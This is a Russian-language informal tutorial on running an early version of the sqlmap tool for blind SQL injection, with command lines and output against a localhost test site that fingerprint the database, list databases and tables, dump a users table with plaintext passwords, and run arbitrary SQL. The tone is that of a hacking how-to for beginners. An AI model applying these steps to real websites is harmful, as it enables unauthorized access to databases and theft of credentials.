Программа предназначена для автоматизации blind SQL Injection. Скачать ее можно отсюда. Скачали? Теперь разархивируем его. Еси вам не знакомо расширение ру то спокойно!!Это не зверь:))) Просто это программа написанная на относительно новом языке програмирования Питон (Python). Запускать нужно программу sqlmap.py. Чтобы запустить её нужно просто перекинуть ее в cmd. Для тех кто не знает. Чтобы запустить cmd нуно нажать на Start-->Run-->cmd. Запустили? Молодцы:)) Теперь чтобы юзать ее нуно опять кинуть прогу в cmd (или нажать на кнопку «вверх» если цмдм не закрывали) и набрать команду например –h что опять таки приведет список всех команд данной проги. Итак разобрались с этой частью? Идём вперед. Хотел бы разачаровать всех ламеров потому что уязвимость вместо вас прога искать не будет. Уязвимый сай нужно сначала найти самому и только потом начать юзать прогу. Ну допустим сайт мы нашли например http://localhost/articles.php?id=1&cat=2. Допустим что нефильтруемая переменная это id. Нужные параметры для успешного взлома это: -u http://localhost/blind/showcontent.php?id=TOKEN&cat=2 -t TOKEN -d 1 Итак начнем: --BANNER GRABBING: [503] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --banner sqlmap() v0.1 coded by belch [*] starting at: 12:53:21 remote DBMS: MySQL banner: '4.1.15-Debian_1ubuntu5-log' [*] shutting down at: 12:53:22 --CURRENT USER: [505] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --current-user sqlmap() v0.1 coded by belch [*] starting at: 02:01:01 remote DBMS: MySQL current user: 'belch@localhost' [*] shutting down at: 02:01:01 --CURRENT DATABASE [506] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --current-database sqlmap() v0.1 coded by belch [*] starting at: 02:01:28 remote DBMS: MySQL current database: 'blind' [*] shutting down at: 02:01:28 --AVAILABLE PRESENT DBS [509] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --get-dbs sqlmap() v0.1 coded by belch [*] starting at: 02:02:22 remote DBMS: MySQL available database: [*] information_schema [*] blind [*] mysql [*] test [*] shutting down at: 02:02:25 Дамп таблицы Теперь давайте сделаем дамп таблицы. (db:blind). Давайте достанем имена таблиц в db 'blind': [510] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --database blind --get-tables sqlmap() v0.1 coded by belch [*] starting at: 02:03:20 remote DBMS: MySQL ----------------------------- DATABASE: blind ----------------------------- news users ----------------------------- [*] shutting down at: 02:03:21 DUMP OF 'news' table: [511] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --database blind --table news --dump sqlmap() v0.1 coded by belch [*] starting at: 02:03:41 remote DBMS: MySQL DATABASE: blind TABLE: news ------------------------------------------------------------------------------------------------- |news |id |highlight ------------------------------------------------------------------------------------------------- |ciao da daniele |1 |numero 1 |sempre ciao da daniele |2 |numero 2 |sempre sempre ciao da daniele |3 |numero 3 ------------------------------------------------------------------------------------------------- [*] shutting down at: 02:03:47 DUMP OF 'users' table: [512] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 --database blind --table users --dump sqlmap() v0.1 coded by belch [*] starting at: 02:04:05 remote DBMS: MySQL DATABASE: blind TABLE: users ------------------------------------- |username |password |id ------------------------------------- |daniele |bellucci |1 |mancinelli |mancio |2 ------------------------------------- [*] shutting down at: 02:04:08 --ESECUZIONE SINGOLI STATEMENT: [518] belch@wild:sqlmap/ => python2.4 ./sqlmap.py -u "http://localhost/blind/showcontent.php?id=TOKEN&cat=2" -t TOKEN -d 1 -e "select version()" sqlmap() v0.1 coded by belch [*] starting at: 02:06:15 remote DBMS: MySQL select version(): '5.0.22-Debian_0ubuntu6.06-log' None [*] shutting down at: 02:06:16 При написании этой статьи был использован файл README в архиве. Хотел бы так же сказать чтобы сделать иньекцию при помощи данной прогу в уязвимом саёте обе переменные должны быть диманическими т.е числовыми. Например прога заработает только если URL такой: http://localhost/articles.php?id=1&cat=2 Если он будет такой: http://localhost/articles.php?id=news&cat=2 то прога не заработает выдав эрор что параметр news не динамический.
|